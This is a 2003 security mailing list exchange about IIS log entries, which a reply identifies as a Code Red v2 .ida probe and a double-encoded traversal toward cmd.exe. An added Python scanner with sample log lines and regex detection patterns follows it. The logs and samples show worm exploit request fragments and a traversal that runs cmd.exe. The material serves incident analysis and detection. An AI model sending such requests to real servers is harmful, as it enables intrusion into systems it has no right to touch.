Security Basics mailing list archives

RE: Suspicious IIS Log entry


From: Joey Peloquin <jpelo1 () jcpenney com>
Date: Tue, 09 Sep 2003 16:48:31 -0500

That's the ancient Code Red v2 worm, exploiting the ISAPI extension for
Index Server (.ida).

 - jp

-----Original Message-----
From: Toby Schau [mailto:Toby.Schau () iacudiv state ia us] 
Sent: Tuesday, September 09, 2003 11:43 AM
To: 'Security-Basics () Securityfocus com'
Subject: Suspicious IIS Log entry


I found the following suspicious entries in my IIS log files. Does
anyone recognize the specific vulnerabilities that someone is attempting to
exploit?
[ex030809.log (20)] : 2003-08-09 05:14:10 xxx.xx.xx.xx- xx.xx.xx.xx 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 -

[ex030908.log (201)] : 2003-09-08 06:31:02 xx.xxxxx.xxx - xxx.xx.xxx.xx 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe 404 -
Thanks
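A small log-scanning script, added here as an illustration and not code from either poster, that classifies IIS W3C entries of the two kinds shown above: the Code Red v2 /default.ida probe (X padding followed by %u-encoded bytes) and the double-encoded traversal toward cmd.exe, distinguishing one that UrlScan rejected from one the server answered with 200. The sample lines, IP addresses and label names are constructed.

```python
import re

# Constructed sample entries laid out like the post's IIS W3C log lines:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status
SAMPLE_LOG = """\
2003-08-09 05:14:10 198.51.100.7 - 203.0.113.5 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 -
2003-09-08 06:31:02 198.51.100.9 - 203.0.113.5 80 GET /<Rejected-By-UrlScan> ~/scripts/..%255c%255c../winnt/system32/cmd.exe 404 -
2003-09-08 06:32:40 198.51.100.9 - 203.0.113.5 80 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200 -
2003-09-08 07:00:01 192.0.2.33 - 203.0.113.5 80 GET /index.html - 200 -
"""

# Code Red v2 request: GET /default.ida with a long run of X padding followed by %u-encoded bytes.
CODE_RED_STEM = re.compile(r"^/default\.ida$", re.IGNORECASE)
CODE_RED_QUERY = re.compile(r"^X{20,}.*%u9090", re.IGNORECASE)
# Directory traversal toward cmd.exe, with raw, URL-encoded or double-encoded (%255c) separators.
TRAVERSAL = re.compile(r"\.\.(?:%255c|%252f|%5c|%2f|/|\\).*(?:system32|cmd\.exe)", re.IGNORECASE)
URLSCAN_MARK = "<Rejected-By-UrlScan>"

def parse_line(line):
    """Split one W3C log line into the fields the classifier needs; None if malformed."""
    parts = line.split()
    if len(parts) < 10:
        return None
    return {"time": parts[0] + " " + parts[1], "client": parts[2],
            "method": parts[6], "stem": parts[7], "query": parts[8], "status": parts[9]}

def classify(entry):
    """Return a finding label for a parsed entry, or None for benign traffic."""
    if CODE_RED_STEM.match(entry["stem"]) and CODE_RED_QUERY.match(entry["query"]):
        return "code-red-v2-ida-probe"
    if TRAVERSAL.search(entry["stem"] + " " + entry["query"]):
        if URLSCAN_MARK in entry["stem"]:
            return "traversal-blocked-by-urlscan"
        # A 200 means the server actually served the traversal path: investigate that host.
        return "traversal-succeeded" if entry["status"] == "200" else "traversal-attempt"
    return None

def scan(log_text):
    """Return (time, client ip, label) for every flagged line in the log text."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label:
            findings.append((entry["time"], entry["client"], label))
    return findings

if __name__ == "__main__":
    for time, client, label in scan(SAMPLE_LOG):
        print(f"{time} {client:15} {label}")
```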


---------------------------------------------------------------------------
Captus Networks
Are you prepared for the next Sobig & Blaster?
 - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
 - Precisely Define and Implement Network Security
 - Automatically Control P2P, IM and Spam Traffic
FIND OUT NOW -  FREE Vulnerability Assessment Toolkit
http://www.captusnetworks.com/ads/42.htm
----------------------------------------------------------------------------


